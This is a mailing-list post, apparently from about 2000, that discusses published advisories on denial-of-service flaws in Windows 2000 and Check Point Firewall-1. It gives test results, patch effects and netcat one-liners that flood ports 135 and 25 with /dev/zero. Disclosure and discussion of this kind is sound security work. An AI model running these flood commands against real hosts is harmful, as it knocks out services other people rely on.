Win2k and /dev/zero

[pete () S3 INTEGRALIS CO UK (Pete Philips)]

Anyone played with this yet?

> SecureXpert Labs Advisory [SX-20000620-2] - Multiple ports/protocols
> partial Denial of Service in Microsoft Windows 2000 Server
>
> Summary
>
> Multiple ports and protocols on Microsoft Windows 2000 Server are susceptible
> to a simple network attack which raises CPU utilization on Windows 2000
> Server to 100%.

My initial results (tested locally on a LAN) are:

Using:
% nc -u <host> 135 < /dev/zero

Results:
Win2k           = 100% CPU for duration of attack
NT4             = 55%  CPU for duration
NT4 + MS00-029
patch           = No effect

The effect of the Jolt2 patch and tcpdump output indicate that
this is a fragmentation attack variation. My tests yielded multiple
fragments of the form:

20780:1480@various  (Frag ID:size@offset)

Anyone tried the Firewall-1 variation?

> SecureXpert Labs Advisory [SX-20000620-3] - Partial Denial of
> Service in Check Point Firewall-1 on Windows NT
>
> Sending a stream of binary zeros over the network to the SMTP port on the firewall
> raises the target system's load to 100% while the load on the attacker's
> system machine remains relatively low.  This can easily be reproduced from
> a Linux system using netcat with an input of /dev/zero, with a command such as
> "nc firewall 25 < /dev/zero".

Pete.

 ---------------------------------------------------------------
|   Pete Philips                                           \|/  |
|   Integralis S3 Team                                      O   |
|   E-mail:  pete.philips () integralis co uk                      |
|   Phone:   +44 118 930 6060                                   |
|   PGP Key: http://www.s3.integralis.co.uk/pgp/pete.pgp        |
 ---------------------------------------------------------------